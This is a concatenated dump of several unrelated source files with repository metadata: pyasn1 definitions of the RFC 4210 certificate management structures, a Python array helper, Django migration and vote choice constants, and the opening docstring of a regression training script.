ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | null | null | null |
src/cross_validation/__init__.py
|
ychnlgy/Chebyshev-Lagrange
|
74292e72b83f992d6c42a2f2db04dfdce5a52aea
|
[
"MIT"
] | 1
|
2022-03-11T07:20:06.000Z
|
2022-03-11T07:20:06.000Z
|
from . import replace_nan
from .leave_one_out import leave_one_out, iter_leaveone, partition_by_uid
from .k_fold import k_fold
from .standard_scale import standard_scale
| 34
| 73
| 0.858824
|
545e9f42fbdc0123124a1148031c80a17b243223
| 26,208
|
py
|
Python
|
lib/pyasn1_modules/rfc4210.py
|
nirzari18/Query-Analysis-Application-on-Google-App-Engine
|
0b767c27b2ec173ce2fe2cbb39cbf71115eb4aba
|
[
"Apache-2.0"
] | 2,151
|
2020-04-18T07:31:17.000Z
|
2022-03-31T08:39:18.000Z
|
lib/pyasn1_modules/rfc4210.py
|
nirzari18/Query-Analysis-Application-on-Google-App-Engine
|
0b767c27b2ec173ce2fe2cbb39cbf71115eb4aba
|
[
"Apache-2.0"
] | 395
|
2020-04-18T08:22:18.000Z
|
2021-12-08T13:04:49.000Z
|
lib/pyasn1_modules/rfc4210.py
|
nirzari18/Query-Analysis-Application-on-Google-App-Engine
|
0b767c27b2ec173ce2fe2cbb39cbf71115eb4aba
|
[
"Apache-2.0"
] | 338
|
2020-04-18T08:03:10.000Z
|
2022-03-29T12:33:22.000Z
|
#
# Certificate Management Protocol structures as per RFC4210
#
# Based on Alex Railean's work
#
from pyasn1.type import tag,namedtype,namedval,univ,constraint,char,useful
from pyasn1_modules import rfc2459, rfc2511, rfc2314
MAX = 64
class KeyIdentifier(univ.OctetString): pass
class CMPCertificate(rfc2459.Certificate): pass
class OOBCert(CMPCertificate): pass
class CertAnnContent(CMPCertificate): pass
class PKIFreeText(univ.SequenceOf):
"""
PKIFreeText ::= SEQUENCE SIZE (1..MAX) OF UTF8String
"""
componentType = char.UTF8String()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
class PollRepContent(univ.SequenceOf):
"""
PollRepContent ::= SEQUENCE OF SEQUENCE {
certReqId INTEGER,
checkAfter INTEGER, -- time in seconds
reason PKIFreeText OPTIONAL
}
"""
class CertReq(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('certReqId', univ.Integer()),
namedtype.NamedType('checkAfter', univ.Integer()),
namedtype.OptionalNamedType('reason', PKIFreeText())
)
componentType = CertReq()
class PollReqContent(univ.SequenceOf):
"""
PollReqContent ::= SEQUENCE OF SEQUENCE {
certReqId INTEGER
}
"""
class CertReq(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('certReqId', univ.Integer())
)
componentType = CertReq()
class InfoTypeAndValue(univ.Sequence):
"""
InfoTypeAndValue ::= SEQUENCE {
infoType OBJECT IDENTIFIER,
infoValue ANY DEFINED BY infoType OPTIONAL
}"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('infoType', univ.ObjectIdentifier()),
namedtype.OptionalNamedType('infoValue', univ.Any())
)
class GenRepContent(univ.SequenceOf):
componentType = InfoTypeAndValue()
class GenMsgContent(univ.SequenceOf):
componentType = InfoTypeAndValue()
class PKIConfirmContent(univ.Null): pass
class CRLAnnContent(univ.SequenceOf):
componentType = rfc2459.CertificateList()
class CAKeyUpdAnnContent(univ.Sequence):
"""
CAKeyUpdAnnContent ::= SEQUENCE {
oldWithNew CMPCertificate,
newWithOld CMPCertificate,
newWithNew CMPCertificate
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('oldWithNew', CMPCertificate()),
namedtype.NamedType('newWithOld', CMPCertificate()),
namedtype.NamedType('newWithNew', CMPCertificate())
)
class RevDetails(univ.Sequence):
"""
RevDetails ::= SEQUENCE {
certDetails CertTemplate,
crlEntryDetails Extensions OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certDetails', rfc2511.CertTemplate()),
namedtype.OptionalNamedType('crlEntryDetails', rfc2459.Extensions())
)
class RevReqContent(univ.SequenceOf):
componentType = RevDetails()
class CertOrEncCert(univ.Choice):
"""
CertOrEncCert ::= CHOICE {
certificate [0] CMPCertificate,
encryptedCert [1] EncryptedValue
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certificate', CMPCertificate().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)
)
),
namedtype.NamedType('encryptedCert', rfc2511.EncryptedValue().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)
)
)
)
class CertifiedKeyPair(univ.Sequence):
"""
CertifiedKeyPair ::= SEQUENCE {
certOrEncCert CertOrEncCert,
privateKey [0] EncryptedValue OPTIONAL,
publicationInfo [1] PKIPublicationInfo OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certOrEncCert', CertOrEncCert()),
namedtype.OptionalNamedType('privateKey', rfc2511.EncryptedValue().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)
)
),
namedtype.OptionalNamedType('publicationInfo', rfc2511.PKIPublicationInfo().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)
)
)
)
class POPODecKeyRespContent(univ.SequenceOf):
componentType = univ.Integer()
class Challenge(univ.Sequence):
"""
Challenge ::= SEQUENCE {
owf AlgorithmIdentifier OPTIONAL,
witness OCTET STRING,
challenge OCTET STRING
}
"""
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('owf', rfc2459.AlgorithmIdentifier()),
namedtype.NamedType('witness', univ.OctetString()),
namedtype.NamedType('challenge', univ.OctetString())
)
class PKIStatus(univ.Integer):
"""
PKIStatus ::= INTEGER {
accepted (0),
grantedWithMods (1),
rejection (2),
waiting (3),
revocationWarning (4),
revocationNotification (5),
keyUpdateWarning (6)
}
"""
namedValues = namedval.NamedValues(
('accepted', 0),
('grantedWithMods', 1),
('rejection', 2),
('waiting', 3),
('revocationWarning', 4),
('revocationNotification', 5),
('keyUpdateWarning', 6)
)
class PKIFailureInfo(univ.BitString):
"""
PKIFailureInfo ::= BIT STRING {
badAlg (0),
badMessageCheck (1),
badRequest (2),
badTime (3),
badCertId (4),
badDataFormat (5),
wrongAuthority (6),
incorrectData (7),
missingTimeStamp (8),
badPOP (9),
certRevoked (10),
certConfirmed (11),
wrongIntegrity (12),
badRecipientNonce (13),
timeNotAvailable (14),
unacceptedPolicy (15),
unacceptedExtension (16),
addInfoNotAvailable (17),
badSenderNonce (18),
badCertTemplate (19),
signerNotTrusted (20),
transactionIdInUse (21),
unsupportedVersion (22),
notAuthorized (23),
systemUnavail (24),
systemFailure (25),
duplicateCertReq (26)
"""
namedValues = namedval.NamedValues(
('badAlg', 0),
('badMessageCheck', 1),
('badRequest', 2),
('badTime', 3),
('badCertId', 4),
('badDataFormat', 5),
('wrongAuthority', 6),
('incorrectData', 7),
('missingTimeStamp', 8),
('badPOP', 9),
('certRevoked', 10),
('certConfirmed', 11),
('wrongIntegrity', 12),
('badRecipientNonce', 13),
('timeNotAvailable', 14),
('unacceptedPolicy', 15),
('unacceptedExtension', 16),
('addInfoNotAvailable', 17),
('badSenderNonce', 18),
('badCertTemplate', 19),
('signerNotTrusted', 20),
('transactionIdInUse', 21),
('unsupportedVersion', 22),
('notAuthorized', 23),
('systemUnavail', 24),
('systemFailure', 25),
('duplicateCertReq', 26)
)
class PKIStatusInfo(univ.Sequence):
"""
PKIStatusInfo ::= SEQUENCE {
status PKIStatus,
statusString PKIFreeText OPTIONAL,
failInfo PKIFailureInfo OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('status', PKIStatus()),
namedtype.OptionalNamedType('statusString', PKIFreeText()),
namedtype.OptionalNamedType('failInfo', PKIFailureInfo())
)
class ErrorMsgContent(univ.Sequence):
"""
ErrorMsgContent ::= SEQUENCE {
pKIStatusInfo PKIStatusInfo,
errorCode INTEGER OPTIONAL,
-- implementation-specific error codes
errorDetails PKIFreeText OPTIONAL
-- implementation-specific error details
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('pKIStatusInfo', PKIStatusInfo()),
namedtype.OptionalNamedType('errorCode', univ.Integer()),
namedtype.OptionalNamedType('errorDetails', PKIFreeText())
)
class CertStatus(univ.Sequence):
"""
CertStatus ::= SEQUENCE {
certHash OCTET STRING,
certReqId INTEGER,
statusInfo PKIStatusInfo OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certHash', univ.OctetString()),
namedtype.NamedType('certReqId', univ.Integer()),
namedtype.OptionalNamedType('statusInfo', PKIStatusInfo())
)
class CertConfirmContent(univ.SequenceOf):
componentType = CertStatus()
class RevAnnContent(univ.Sequence):
"""
RevAnnContent ::= SEQUENCE {
status PKIStatus,
certId CertId,
willBeRevokedAt GeneralizedTime,
badSinceDate GeneralizedTime,
crlDetails Extensions OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('status', PKIStatus()),
namedtype.NamedType('certId', rfc2511.CertId()),
namedtype.NamedType('willBeRevokedAt', useful.GeneralizedTime()),
namedtype.NamedType('badSinceDate', useful.GeneralizedTime()),
namedtype.OptionalNamedType('crlDetails', rfc2459.Extensions())
)
class RevRepContent(univ.Sequence):
"""
RevRepContent ::= SEQUENCE {
status SEQUENCE SIZE (1..MAX) OF PKIStatusInfo,
revCerts [0] SEQUENCE SIZE (1..MAX) OF CertId
OPTIONAL,
crls [1] SEQUENCE SIZE (1..MAX) OF CertificateList
OPTIONAL
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('status', PKIStatusInfo()),
namedtype.OptionalNamedType('revCerts', univ.SequenceOf(
componentType=rfc2511.CertId()
).subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)
)
),
namedtype.OptionalNamedType('crls', univ.SequenceOf(
componentType=rfc2459.CertificateList()
).subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)
)
)
)
class KeyRecRepContent(univ.Sequence):
"""
KeyRecRepContent ::= SEQUENCE {
status PKIStatusInfo,
newSigCert [0] CMPCertificate OPTIONAL,
caCerts [1] SEQUENCE SIZE (1..MAX) OF
CMPCertificate OPTIONAL,
keyPairHist [2] SEQUENCE SIZE (1..MAX) OF
CertifiedKeyPair OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('status', PKIStatusInfo()),
namedtype.OptionalNamedType('newSigCert', CMPCertificate().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)
)
),
namedtype.OptionalNamedType('caCerts', univ.SequenceOf(
componentType=CMPCertificate()
).subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1),
subtypeSpec=constraint.ValueSizeConstraint(1, MAX)
)
),
namedtype.OptionalNamedType('keyPairHist', univ.SequenceOf(
componentType=CertifiedKeyPair()
).subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 2),
subtypeSpec=constraint.ValueSizeConstraint(1, MAX)
)
)
)
class CertResponse(univ.Sequence):
"""
CertResponse ::= SEQUENCE {
certReqId INTEGER,
status PKIStatusInfo,
certifiedKeyPair CertifiedKeyPair OPTIONAL,
rspInfo OCTET STRING OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('certReqId', univ.Integer()),
namedtype.NamedType('status', PKIStatusInfo()),
namedtype.OptionalNamedType('certifiedKeyPair', CertifiedKeyPair()),
namedtype.OptionalNamedType('rspInfo', univ.OctetString())
)
class CertRepMessage(univ.Sequence):
"""
CertRepMessage ::= SEQUENCE {
caPubs [1] SEQUENCE SIZE (1..MAX) OF CMPCertificate
OPTIONAL,
response SEQUENCE OF CertResponse
}
"""
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('caPubs', univ.SequenceOf(
componentType=CMPCertificate()
).subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,1)
)
),
namedtype.NamedType('response', univ.SequenceOf(
componentType=CertResponse())
)
)
class POPODecKeyChallContent(univ.SequenceOf):
componentType = Challenge()
class OOBCertHash(univ.Sequence):
"""
OOBCertHash ::= SEQUENCE {
hashAlg [0] AlgorithmIdentifier OPTIONAL,
certId [1] CertId OPTIONAL,
hashVal BIT STRING
}
"""
componentType = namedtype.NamedTypes(
namedtype.OptionalNamedType('hashAlg',
rfc2459.AlgorithmIdentifier().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,0)
)
),
namedtype.OptionalNamedType('certId', rfc2511.CertId().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,1)
)
),
namedtype.NamedType('hashVal', univ.BitString())
)
# pyasn1 does not naturally handle recursive definitions, thus this hack:
# NestedMessageContent ::= PKIMessages
class NestedMessageContent(univ.SequenceOf):
"""
NestedMessageContent ::= PKIMessages
"""
componentType = univ.Any()
class DHBMParameter(univ.Sequence):
"""
DHBMParameter ::= SEQUENCE {
owf AlgorithmIdentifier,
-- AlgId for a One-Way Function (SHA-1 recommended)
mac AlgorithmIdentifier
-- the MAC AlgId (e.g., DES-MAC, Triple-DES-MAC [PKCS11],
} -- or HMAC [RFC2104, RFC2202])
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('owf', rfc2459.AlgorithmIdentifier()),
namedtype.NamedType('mac', rfc2459.AlgorithmIdentifier())
)
id_DHBasedMac = univ.ObjectIdentifier('1.2.840.113533.7.66.30')
class PBMParameter(univ.Sequence):
"""
PBMParameter ::= SEQUENCE {
salt OCTET STRING,
owf AlgorithmIdentifier,
iterationCount INTEGER,
mac AlgorithmIdentifier
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('salt', univ.OctetString().subtype(
subtypeSpec=constraint.ValueSizeConstraint(0, 128)
)
),
namedtype.NamedType('owf', rfc2459.AlgorithmIdentifier()),
namedtype.NamedType('iterationCount', univ.Integer()),
namedtype.NamedType('mac', rfc2459.AlgorithmIdentifier())
)
id_PasswordBasedMac = univ.ObjectIdentifier('1.2.840.113533.7.66.13')
class PKIProtection(univ.BitString): pass
# pyasn1 does not naturally handle recursive definitions, thus this hack:
# NestedMessageContent ::= PKIMessages
nestedMessageContent = NestedMessageContent().subtype(explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,20))
class PKIBody(univ.Choice):
"""
PKIBody ::= CHOICE { -- message-specific body elements
ir [0] CertReqMessages, --Initialization Request
ip [1] CertRepMessage, --Initialization Response
cr [2] CertReqMessages, --Certification Request
cp [3] CertRepMessage, --Certification Response
p10cr [4] CertificationRequest, --imported from [PKCS10]
popdecc [5] POPODecKeyChallContent, --pop Challenge
popdecr [6] POPODecKeyRespContent, --pop Response
kur [7] CertReqMessages, --Key Update Request
kup [8] CertRepMessage, --Key Update Response
krr [9] CertReqMessages, --Key Recovery Request
krp [10] KeyRecRepContent, --Key Recovery Response
rr [11] RevReqContent, --Revocation Request
rp [12] RevRepContent, --Revocation Response
ccr [13] CertReqMessages, --Cross-Cert. Request
ccp [14] CertRepMessage, --Cross-Cert. Response
ckuann [15] CAKeyUpdAnnContent, --CA Key Update Ann.
cann [16] CertAnnContent, --Certificate Ann.
rann [17] RevAnnContent, --Revocation Ann.
crlann [18] CRLAnnContent, --CRL Announcement
pkiconf [19] PKIConfirmContent, --Confirmation
nested [20] NestedMessageContent, --Nested Message
genm [21] GenMsgContent, --General Message
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('ir', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,0)
)
),
namedtype.NamedType('ip', CertRepMessage().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,1)
)
),
namedtype.NamedType('cr', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,2)
)
),
namedtype.NamedType('cp', CertRepMessage().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,3)
)
),
namedtype.NamedType('p10cr', rfc2314.CertificationRequest().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,4)
)
),
namedtype.NamedType('popdecc', POPODecKeyChallContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,5)
)
),
namedtype.NamedType('popdecr', POPODecKeyRespContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,6)
)
),
namedtype.NamedType('kur', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,7)
)
),
namedtype.NamedType('kup', CertRepMessage().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,8)
)
),
namedtype.NamedType('krr', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,9)
)
),
namedtype.NamedType('krp', KeyRecRepContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,10)
)
),
namedtype.NamedType('rr', RevReqContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,11)
)
),
namedtype.NamedType('rp', RevRepContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,12)
)
),
namedtype.NamedType('ccr', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,13)
)
),
namedtype.NamedType('ccp', CertRepMessage().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,14)
)
),
namedtype.NamedType('ckuann', CAKeyUpdAnnContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,15)
)
),
namedtype.NamedType('cann', CertAnnContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,16)
)
),
namedtype.NamedType('rann', RevAnnContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,17)
)
),
namedtype.NamedType('crlann', CRLAnnContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,18)
)
),
namedtype.NamedType('pkiconf', PKIConfirmContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,19)
)
),
namedtype.NamedType('nested', nestedMessageContent),
# namedtype.NamedType('nested', NestedMessageContent().subtype(
# explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,20)
# )
# ),
namedtype.NamedType('genm', GenMsgContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,21)
)
)
)
class PKIHeader(univ.Sequence):
"""
PKIHeader ::= SEQUENCE {
pvno INTEGER { cmp1999(1), cmp2000(2) },
sender GeneralName,
recipient GeneralName,
messageTime [0] GeneralizedTime OPTIONAL,
protectionAlg [1] AlgorithmIdentifier OPTIONAL,
senderKID [2] KeyIdentifier OPTIONAL,
recipKID [3] KeyIdentifier OPTIONAL,
transactionID [4] OCTET STRING OPTIONAL,
senderNonce [5] OCTET STRING OPTIONAL,
recipNonce [6] OCTET STRING OPTIONAL,
freeText [7] PKIFreeText OPTIONAL,
generalInfo [8] SEQUENCE SIZE (1..MAX) OF
InfoTypeAndValue OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('pvno', univ.Integer(
namedValues=namedval.NamedValues(
('cmp1999', 1),
('cmp2000', 2)
)
)
),
namedtype.NamedType('sender', rfc2459.GeneralName()),
namedtype.NamedType('recipient', rfc2459.GeneralName()),
namedtype.OptionalNamedType('messageTime', useful.GeneralizedTime().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('protectionAlg', rfc2459.AlgorithmIdentifier().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))),
namedtype.OptionalNamedType('senderKID', rfc2459.KeyIdentifier().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('recipKID', rfc2459.KeyIdentifier().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3))),
namedtype.OptionalNamedType('transactionID', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 4))),
namedtype.OptionalNamedType('senderNonce', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 5))),
namedtype.OptionalNamedType('recipNonce', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 6))),
namedtype.OptionalNamedType('freeText', PKIFreeText().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 7))),
namedtype.OptionalNamedType('generalInfo',
univ.SequenceOf(
componentType=InfoTypeAndValue().subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 8)
)
)
)
)
class ProtectedPart(univ.Sequence):
"""
ProtectedPart ::= SEQUENCE {
header PKIHeader,
body PKIBody
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('header', PKIHeader()),
namedtype.NamedType('infoValue', PKIBody())
)
class PKIMessage(univ.Sequence):
"""
PKIMessage ::= SEQUENCE {
header PKIHeader,
body PKIBody,
protection [0] PKIProtection OPTIONAL,
extraCerts [1] SEQUENCE SIZE (1..MAX) OF CMPCertificate
OPTIONAL
}"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('header', PKIHeader()),
namedtype.NamedType('body', PKIBody()),
namedtype.OptionalNamedType('protection', PKIProtection().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType( 'extraCerts',
univ.SequenceOf(
componentType=CMPCertificate()
).subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)
)
)
)
class PKIMessages(univ.SequenceOf):
"""
PKIMessages ::= SEQUENCE SIZE (1..MAX) OF PKIMessage
"""
componentType = PKIMessage()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
# pyasn1 does not naturally handle recursive definitions, thus this hack:
# NestedMessageContent ::= PKIMessages
NestedMessageContent.componentType = PKIMessages()
nestedMessageContent.componentType = PKIMessages()
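# --------------------------------------------------------------------------
# Illustrative usage sketch (an addition for clarity, not part of the original
# module): a DER-encoded CMP message can be decoded against the PKIMessage
# spec defined above and re-encoded with the standard pyasn1 codecs. The
# helper name and the `der_bytes` argument are hypothetical placeholders.
def _example_roundtrip_pki_message(der_bytes):
    from pyasn1.codec.der import decoder as der_decoder, encoder as der_encoder
    pki_message, _remainder = der_decoder.decode(der_bytes, asn1Spec=PKIMessage())
    header = pki_message.getComponentByName('header')  # PKIHeader
    body = pki_message.getComponentByName('body')      # PKIBody (CHOICE)
    return header, body, der_encoder.encode(pki_message)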
| 37.655172
| 151
| 0.603709
|
5542fa8291e04589457af28826be55906b3e9675
| 509
|
py
|
Python
|
datastructures/arrays/find_continuous_subsegment_counts.py
|
hariharanragothaman/pymaster
|
b3d033b4d5c75c69f587c94d9d12cd4a349a6a69
|
[
"Apache-2.0"
] | 10
|
2020-09-21T22:23:09.000Z
|
2022-01-25T16:58:44.000Z
|
datastructures/arrays/find_continuous_subsegment_counts.py
|
hariharanragothaman/pymaster
|
b3d033b4d5c75c69f587c94d9d12cd4a349a6a69
|
[
"Apache-2.0"
] | null | null | null |
datastructures/arrays/find_continuous_subsegment_counts.py
|
hariharanragothaman/pymaster
|
b3d033b4d5c75c69f587c94d9d12cd4a349a6a69
|
[
"Apache-2.0"
] | null | null | null |
def find_continuous_subsegment(arr):
"""
This helps in splitting the array and finding continuous subsegments smartly
"""
temp = []
n = len(arr)
cnt, prev = 1, arr[0]
for i in range(n - 1):
if arr[i + 1] == prev:
cnt += 1
else:
temp.append(cnt)
cnt = 1
prev = arr[i + 1]
temp.append(cnt)
print("The tmp is:", temp)
if __name__ == "__main__":
arr = [2, 2, 2, 1, 1, 2, 2]
find_continuous_subsegment(arr)
| 22.130435
| 80
| 0.522593
|
3de7b1b88e8bc5fdea27e7fbd09eecf9833a8055
| 369
|
py
|
Python
|
eventpage/migrations/0027_rename_html_announcement_markdown.py
|
lukas2511/voctoconf
|
7c9d05e0bddadfb6e589bf73e2adeb9d83594038
|
[
"MIT"
] | 21
|
2020-08-24T13:27:03.000Z
|
2021-10-15T09:17:46.000Z
|
eventpage/migrations/0027_rename_html_announcement_markdown.py
|
lukas2511/voctoconf
|
7c9d05e0bddadfb6e589bf73e2adeb9d83594038
|
[
"MIT"
] | null | null | null |
eventpage/migrations/0027_rename_html_announcement_markdown.py
|
lukas2511/voctoconf
|
7c9d05e0bddadfb6e589bf73e2adeb9d83594038
|
[
"MIT"
] | 5
|
2020-08-25T16:34:51.000Z
|
2021-02-19T04:48:10.000Z
|
# Generated by Django 3.2 on 2021-04-24 09:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('eventpage', '0026_auto_20200823_0133'),
]
operations = [
migrations.RenameField(
model_name='announcement',
old_name='html',
new_name='markdown',
),
]
| 19.421053
| 49
| 0.593496
|
a40f1135708bbac18df1c9ee386d3a19d00d70dc
| 1,648
|
py
|
Python
|
laws/vote_choices.py
|
navotsil/Open-Knesset
|
d6cc6457f87e67a3dbeaec9c1ccbc8d8b7c60c04
|
[
"BSD-3-Clause"
] | 7
|
2015-03-05T11:14:23.000Z
|
2017-02-11T18:06:25.000Z
|
laws/vote_choices.py
|
navotsil/Open-Knesset
|
d6cc6457f87e67a3dbeaec9c1ccbc8d8b7c60c04
|
[
"BSD-3-Clause"
] | 7
|
2020-02-12T01:09:15.000Z
|
2022-03-11T23:25:12.000Z
|
laws/vote_choices.py
|
navotsil/Open-Knesset
|
d6cc6457f87e67a3dbeaec9c1ccbc8d8b7c60c04
|
[
"BSD-3-Clause"
] | 11
|
2015-02-21T09:45:06.000Z
|
2021-05-05T06:01:24.000Z
|
from django.utils.translation import ugettext_lazy as _
from django.db.models import Q
TYPE_CHOICES = (
('all', _('All votes')),
('law-approve', _('Law Approvals')),
('second-call', _('Second Call')),
('demurrer', _('Demurrer')),
('no-confidence', _('Motion of no confidence')),
('pass-to-committee', _('Pass to committee')),
('continuation', _('Continuation')),
)
SIMPLE_TYPE_CHOICES = (
('', '---'),
('pre vote', _('Pre Vote')),
('first vote', _('First Vote')),
('approve vote', _('Approval Vote')),
)
TAGGED_CHOICES = (
('all', _('All')),
('false', _('Untagged Votes')),
)
ORDER_CHOICES = (
('time', _('Time')),
('controversy', _('Controversy')),
('against-party', _('Against Party')),
('votes', _('Number of votes')),
)
BILL_STAGE_CHOICES = (
(u'?', _(u'Unknown')),
(u'0', _(u'Frozen in previous knesset')),
(u'1', _(u'Proposed')),
(u'2', _(u'Pre-Approved')),
(u'-2',_(u'Failed Pre-Approval')),
(u'-2.1', _(u'Converted to discussion')),
(u'3', _(u'In Committee')),
(u'4', _(u'First Vote')),
(u'-4',_(u'Failed First Vote')),
(u'5', _(u'Committee Corrections')),
(u'6', _(u'Approved')),
(u'-6',_(u'Failed Approval')),
)
BILL_AGRR_STAGES = { 'proposed':Q(stage__isnull=False),
'pre':Q(stage='2')|Q(stage='3')|Q(stage='4')|Q(stage='5')|Q(stage='6'),
'first':Q(stage='4')|Q(stage='5')|Q(stage='6'),
'approved':Q(stage='6'),
}
BILL_TAGGED_CHOICES = (
('all', _('All')),
('false', _('Untagged Proposals')),
)
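# Illustrative usage sketch (an addition, not part of the original file): the Q
# objects in BILL_AGRR_STAGES are meant to be passed straight into a queryset
# filter. The Bill model import below is an assumption about this project's
# layout, so the example is left commented out.
# from laws.models import Bill
# approved_bills = Bill.objects.filter(BILL_AGRR_STAGES['approved'])
# reached_first_vote = Bill.objects.filter(BILL_AGRR_STAGES['first'])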
| 27.932203
| 87
| 0.518204
|
6359821acb4b9462651368e5fc495b0b7a073109
| 7,898
|
py
|
Python
|
src/Regression/phys_training.py
|
mattcwilde/astrokriging
|
05476a3fd69a66ffa28b16bad5a260a8272c6712
|
[
"BSD-3-Clause"
] | null | null | null |
src/Regression/phys_training.py
|
mattcwilde/astrokriging
|
05476a3fd69a66ffa28b16bad5a260a8272c6712
|
[
"BSD-3-Clause"
] | null | null | null |
src/Regression/phys_training.py
|
mattcwilde/astrokriging
|
05476a3fd69a66ffa28b16bad5a260a8272c6712
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 30 11:41:38 2016
@author: dflemin3
This script performs model comparison to see which estimator performs the best on VPLANET
simulation results. The script then performs a bootstrapping procedure on each fitted
model to see where it performs poorly and hence where additional simulations need to
be run.
For this script, I test linear regression, ridge regression and an ensemble
method, Random Forest regression. Error estimates computed using bootstrapping
will only work for linear and ridge regression, and bootstrapping is used to
build the random forest regressor.
\begin{tabular}{llrrrrr}
\toprule
{} & est & training MSE & testing MSE & training R\textasciicircum2 & testing R\textasciicircum2 & Median Std \\
\midrule
0 & OLS & 0.099971 & 0.102640 & 0.582150 & 0.569601 & 0.015973 \\
1 & RR & 0.099974 & 0.102606 & 0.582140 & 0.569746 & 0.015426 \\
2 & RF & 0.014023 & 0.033080 & 0.941388 & 0.861286 & 0.000000 \\
\bottomrule
